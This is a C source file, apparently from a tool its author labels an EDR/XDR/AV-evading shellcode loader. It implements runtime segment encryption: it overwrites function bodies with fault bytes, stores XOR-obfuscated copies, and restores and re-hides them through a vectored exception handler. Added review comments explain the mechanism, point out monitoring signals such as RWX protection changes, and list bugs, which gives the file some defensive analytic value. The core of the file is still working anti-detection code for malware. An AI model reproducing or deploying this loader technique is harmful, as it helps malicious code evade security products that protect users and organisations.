// --------------------------------------------------
// │ Author : Evilbytecode │
// │ Name : Evilbytecode-EDR/XDR/AV-SHC-LOADER│
// │ Contact : https://github.com/Evilbytecode │
// --------------------------------------------------
// This program is distributed for educational purposes only.
// Credits to : https://github.com/C5Hackr/Segment-Encryption
#include <Windows.h>
#define USE_XOR_ENCRYPTION TRUE
#if USE_XOR_ENCRYPTION
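// Repeating-key XOR material. The key is a plain string literal, so it is
// recoverable from the binary image and from process memory; what follows is
// obfuscation of saved code bytes, not confidentiality.
unsigned char xor_key[] = "YwAYwAonvsgHUbnoYwAonvsgHUbnnvsgHUbn";
// Key length in bytes, excluding the terminating NUL. It stays 0 until
// EncryptFunction sets it with strlen(); size_t is an integer type, so the
// initializer is 0 rather than the pointer constant NULL.
size_t xor_key_size = 0;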
#endif
// Bookkeeping for one protected function. Despite the name, each instance
// describes a single function; the EncryptedFunctions array below is the list.
typedef struct {
// Start of the function body. VEHDecryptionHandler compares faulting
// addresses against this value.
uintptr_t FunctionAddress;
// Address of the trailing jmp/call to EndSED that ends the protected region.
// A 0xCC byte is placed here while the body is in its restored state.
uintptr_t ReturnAddress;
// Number of bytes from FunctionAddress up to (not including) ReturnAddress.
__int64 functionSize;
// Heap copy of the original bytes, allocated by EncryptFunction and held
// XOR-transformed while the live code is overwritten. Nothing in this file frees it.
char* originalInstructions;
// TRUE when the terminator byte is 0xE9 (jmp), FALSE when it is 0xE8 (call).
BOOL IsJMPReturn;
} EncryptedFunctionList;
// Growable array of entries, realloc'd by EncryptFunction. The exception
// handler iterates it without any locking.
EncryptedFunctionList* EncryptedFunctions = NULL;
size_t num_EncryptedFunctions = 0;
// One-shot initialization flag for the critical section, the key length and
// the vectored handler registration (see EncryptFunction).
BOOL EncryptHandlerInitialized = FALSE;
// Invokes ptr as if it were `void *(*)(va_list)`: the callee receives the
// va_list object itself as its single argument. Calling through a pointer
// type that does not match the target's real signature is undefined behavior,
// so despite the name this is only well-defined for functions declared to
// take a va_list.
#define CALL_FUNCTION_SAFE(ptr, args) ((void*(*)(va_list))(ptr))(args)
// End-of-region marker. EncryptFunction scans a protected function's bytes for
// a rel32 jmp/call whose target is EndSED and treats that instruction as the
// end of the region to protect. Optimization is switched off around it so the
// call is not folded away or inlined; it is presumably exported so that its
// address is resolvable from the scanned code — confirm against the build.
#pragma optimize("", off)
__declspec(dllexport) void* EndSED(void* returnValue)
{
// Pure pass-through: the argument is returned unchanged.
return returnValue;
}
#pragma optimize("", on)
#if USE_XOR_ENCRYPTION
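// Repeating-key XOR over data in place: data[i] ^= key[i % key_len].
// XOR is its own inverse, so applying this twice with the same key restores
// the input (xor_decrypt performs the identical operation). With a fixed key
// embedded in the binary this is obfuscation, not confidentiality.
//
// data     : buffer transformed in place
// data_len : number of bytes to transform (0 is a no-op)
// key      : key bytes; never modified
// key_len  : key length. The modulo requires key_len > 0, so a zero-length
//            key (e.g. xor_key_size before EncryptFunction initializes it) or
//            a NULL data/key pointer makes the call a no-op instead of
//            undefined behavior.
void xor_encrypt(unsigned char* data, size_t data_len, const unsigned char* key, size_t key_len)
{
    if (data == NULL || key == NULL || key_len == 0)
    {
        return;
    }
    for (size_t offset = 0; offset < data_len; offset++)
    {
        data[offset] ^= key[offset % key_len];
    }
}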
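// Reverses xor_encrypt: because XOR is self-inverse, this applies exactly the
// same repeating-key transform, data[i] ^= key[i % key_len], in place.
//
// data     : buffer transformed in place
// data_len : number of bytes to transform (0 is a no-op)
// key      : key bytes; never modified
// key_len  : key length. A zero-length key (xor_key_size is 0 until
//            EncryptFunction initializes it) or a NULL data/key pointer makes
//            the call a no-op instead of a division by zero.
void xor_decrypt(unsigned char* data, size_t data_len, const unsigned char* key, size_t key_len)
{
    if (data == NULL || key == NULL || key_len == 0)
    {
        return;
    }
    size_t key_pos = 0;
    for (size_t offset = 0; offset < data_len; offset++)
    {
        data[offset] ^= key[key_pos];
        // Advance the key cursor cyclically instead of recomputing the modulo.
        if (++key_pos == key_len)
        {
            key_pos = 0;
        }
    }
}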
#endif
// Takes a function out of its executable state: copies its bytes into
// originalInstructions, XOR-transforms that copy, then overwrites the live code
// with one repeated byte that the author relies on to fault with
// EXCEPTION_ILLEGAL_INSTRUCTION (VEHDecryptionHandler restores the body on that
// exception). The page is flipped to PAGE_EXECUTE_READWRITE for the write and
// then set back; from a monitoring standpoint the observable side effect is an
// RWX protection change on an executable region followed by writes into it.
// VirtualProtect return values are not checked, so a failed flip leads straight
// to a write into non-writable memory.
//
// address              : start of the live code to overwrite
// originalInstructions : caller-owned buffer of at least SIZE_OF_FUNCTION bytes
// SIZE_OF_FUNCTION     : byte length of the region
__declspec(noinline) void EncryptCodeSection(LPVOID address, char* originalInstructions, int SIZE_OF_FUNCTION)
{
memcpy(originalInstructions, address, SIZE_OF_FUNCTION);
#if USE_XOR_ENCRYPTION
// Only the saved copy is transformed; the live code is filled below.
xor_encrypt((unsigned char*)originalInstructions, SIZE_OF_FUNCTION, xor_key, xor_key_size);
#endif
DWORD oldProtect;
VirtualProtect(address, SIZE_OF_FUNCTION, PAGE_EXECUTE_READWRITE, &oldProtect);
for (int i = 0; i < SIZE_OF_FUNCTION; i++)
{
#if _WIN64
// Fill byte per architecture. NOTE(review): the value is stored through a
// plain char, so the 0xFE case is an implementation-defined conversion.
* ((char*)((uintptr_t)address + i)) = 0x1F;
#else
* ((char*)((uintptr_t)address + i)) = 0xFE;
#endif
}
VirtualProtect(address, SIZE_OF_FUNCTION, oldProtect, &oldProtect);
}
// Writes a single 0xCC (int3) byte at address so that executing it raises
// EXCEPTION_BREAKPOINT; VEHDecryptionHandler uses that to notice that a restored
// function has reached its terminating jmp/call. Protection is flipped to RWX
// for the one-byte write and restored afterwards. VirtualProtect failures are
// ignored and the function unconditionally returns TRUE, so the caller cannot
// tell whether the byte was actually written.
__declspec(noinline) BOOL SetBreakpoint(LPVOID address)
{
DWORD oldProtect;
VirtualProtect(address, sizeof(char), PAGE_EXECUTE_READWRITE, &oldProtect);
*((char*)address) = 0xCC;
VirtualProtect(address, sizeof(char), oldProtect, &oldProtect);
return TRUE;
}
// Vectored exception handler that drives the restore/re-hide cycle.
// - EXCEPTION_ILLEGAL_INSTRUCTION at a registered FunctionAddress: the fill
//   bytes written by EncryptCodeSection were executed. The saved copy is
//   XOR-reversed in place, copied back over the live code, and a 0xCC is
//   planted at the entry's ReturnAddress.
// - EXCEPTION_BREAKPOINT at a registered ReturnAddress: the restored body ran
//   to its terminating jmp/call. The original 0xE9/0xE8 byte is put back and
//   EncryptCodeSection hides the body again (which also re-transforms the saved
//   copy from the live bytes).
// Anything else, or an unmatched address, continues the search.
// NOTE(review): EncryptedFunctions is read here without synchronization while
// EncryptFunction may realloc it from another thread; the critical section
// cs is only taken in CallFunction.
//
// exceptions : exception record and context supplied by the OS
// returns    : EXCEPTION_CONTINUE_EXECUTION when the fault was handled,
//              EXCEPTION_CONTINUE_SEARCH otherwise
__declspec(noinline) LONG WINAPI VEHDecryptionHandler(PEXCEPTION_POINTERS exceptions)
{
if (exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_ILLEGAL_INSTRUCTION)
{
for (size_t i = 0; i < num_EncryptedFunctions; i++)
{
if ((uintptr_t)((uintptr_t)exceptions->ExceptionRecord->ExceptionAddress) == (uintptr_t)EncryptedFunctions[i].FunctionAddress)
{
DWORD oldProtect;
// Return value unchecked; a failed flip makes the memcpy below a write
// into non-writable memory.
VirtualProtect((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].functionSize, PAGE_EXECUTE_READWRITE, &oldProtect);
#if USE_XOR_ENCRYPTION
// The saved copy is reversed in place; it is re-transformed when
// EncryptCodeSection runs again from the breakpoint path.
xor_decrypt((unsigned char*)EncryptedFunctions[i].originalInstructions, EncryptedFunctions[i].functionSize, xor_key, xor_key_size);
#endif
memcpy((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].originalInstructions, EncryptedFunctions[i].functionSize);
VirtualProtect((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].functionSize, oldProtect, &oldProtect);
// Arm the end-of-function trap so the body can be hidden again.
SetBreakpoint((LPVOID)EncryptedFunctions[i].ReturnAddress);
return EXCEPTION_CONTINUE_EXECUTION;
}
}
return EXCEPTION_CONTINUE_SEARCH;
}
else if (exceptions->ExceptionRecord->ExceptionCode == EXCEPTION_BREAKPOINT)
{
for (size_t i = 0; i < num_EncryptedFunctions; i++)
{
if ((uintptr_t)((uintptr_t)exceptions->ExceptionRecord->ExceptionAddress) == (uintptr_t)EncryptedFunctions[i].ReturnAddress)
{
DWORD oldProtect;
// NOTE(review): only one byte is written here, but the protection change
// spans functionSize bytes starting at ReturnAddress, i.e. past the region.
VirtualProtect(exceptions->ExceptionRecord->ExceptionAddress, EncryptedFunctions[i].functionSize, PAGE_EXECUTE_READWRITE, &oldProtect);
if (EncryptedFunctions[i].IsJMPReturn)
{
// Restore the jmp opcode that SetBreakpoint replaced.
*((char*)exceptions->ExceptionRecord->ExceptionAddress) = 0xE9;
}
else
{
// Restore the call opcode that SetBreakpoint replaced.
*((char*)exceptions->ExceptionRecord->ExceptionAddress) = 0xE8;
}
VirtualProtect(exceptions->ExceptionRecord->ExceptionAddress, EncryptedFunctions[i].functionSize, oldProtect, &oldProtect);
EncryptCodeSection((LPVOID)EncryptedFunctions[i].FunctionAddress, EncryptedFunctions[i].originalInstructions, EncryptedFunctions[i].functionSize);
return EXCEPTION_CONTINUE_EXECUTION;
}
}
return EXCEPTION_CONTINUE_SEARCH;
}
else
{
return EXCEPTION_CONTINUE_SEARCH;
}
}
// Serializes CallFunction. Initialized lazily by EncryptFunction, so it is
// invalid until at least one function has been registered.
CRITICAL_SECTION cs;
// Registers a function for the hide/restore cycle: on first use it initializes
// cs, the XOR key length and the vectored handler; then it appends an entry,
// scans forward from functionPointer for the rel32 jmp (0xE9) or call (0xE8)
// whose target is EndSED, records that instruction as ReturnAddress, saves the
// bytes before it and hands the region to EncryptCodeSection.
// NOTE(review):
// - The one-shot initialization is not thread-safe; it runs outside any lock.
// - xor_key_size/xor_key are referenced unconditionally here, so the file does
//   not build with USE_XOR_ENCRYPTION set to FALSE.
// - realloc's result is assigned straight back and never checked; on failure
//   the old array is leaked and the next line dereferences NULL. malloc below
//   is likewise unchecked.
// - The scan loop has no upper bound and reads forward until the terminator
//   is found; the (DWORD) casts truncate 64-bit pointers, which presumably
//   cancels out because only a 32-bit displacement is compared — confirm.
// - ReturnAddress is stored before FunctionAddress/functionSize, so the handler
//   can observe a partially filled entry if an exception arrives in between.
//
// functionPointer : address of the function to protect; it must end with a
//                   jmp or call to EndSED
__declspec(noinline) void EncryptFunction(uintptr_t functionPointer)
{
if (!EncryptHandlerInitialized)
{
InitializeCriticalSection(&cs);
xor_key_size = strlen((char*)xor_key);
EncryptHandlerInitialized = TRUE;
// Position 1 = first handler to run for every exception in the process.
AddVectoredExceptionHandler(1, &VEHDecryptionHandler);
}
num_EncryptedFunctions++;
EncryptedFunctions = (EncryptedFunctionList*)realloc(EncryptedFunctions, num_EncryptedFunctions * sizeof(EncryptedFunctionList));
EncryptedFunctionList* currentHookInfo = &EncryptedFunctions[num_EncryptedFunctions - 1];
int SIZE_OF_FUNCTION = 0;
unsigned char* current_address = (unsigned char*)((void*)functionPointer);
while (TRUE)
{
BYTE* ptr = (BYTE*)current_address;
// rel32 displacement is relative to the end of the 5-byte instruction
// (hence the +5); the DWORD read at +1 is unaligned.
if (ptr[0] == 0xE9 && *((DWORD*)(current_address + 1)) == ((DWORD)EndSED - ((DWORD)current_address + 5)))
{
currentHookInfo->IsJMPReturn = TRUE;
currentHookInfo->ReturnAddress = (uintptr_t)current_address;
break;
}
else if (ptr[0] == 0xE8 && *((DWORD*)(current_address + 1)) == ((DWORD)EndSED - ((DWORD)current_address + 5)))
{
currentHookInfo->IsJMPReturn = FALSE;
currentHookInfo->ReturnAddress = (uintptr_t)current_address;
break;
}
current_address++;
SIZE_OF_FUNCTION++;
}
currentHookInfo->FunctionAddress = functionPointer;
currentHookInfo->functionSize = SIZE_OF_FUNCTION;
currentHookInfo->originalInstructions = (char*)malloc(SIZE_OF_FUNCTION * sizeof(char));
// Redundant with the memcpy EncryptCodeSection performs first thing.
memcpy(currentHookInfo->originalInstructions, (void*)functionPointer, SIZE_OF_FUNCTION);
EncryptCodeSection((LPVOID)functionPointer, currentHookInfo->originalInstructions, SIZE_OF_FUNCTION);
}
// Serialized call into a protected function. Holds cs for the whole call so
// only one hide/restore cycle is in flight at a time. The target is invoked
// through CALL_FUNCTION_SAFE, i.e. as `void *(*)(va_list)`: the callee gets the
// va_list as its single argument and must be written to take one; the variadic
// arguments are not forwarded individually.
// NOTE(review): cs is only initialized inside EncryptFunction, so calling this
// before any EncryptFunction call enters an uninitialized critical section.
//
// ptr     : function to invoke
// ...     : arguments packed into the va_list handed to ptr
// returns : whatever the callee returns
__declspec(noinline) void* CallFunction(void* ptr, ...)
{
EnterCriticalSection(&cs);
va_list args;
va_start(args, ptr);
void* returnValue = CALL_FUNCTION_SAFE(ptr, args);
va_end(args);
LeaveCriticalSection(&cs);
return returnValue;
}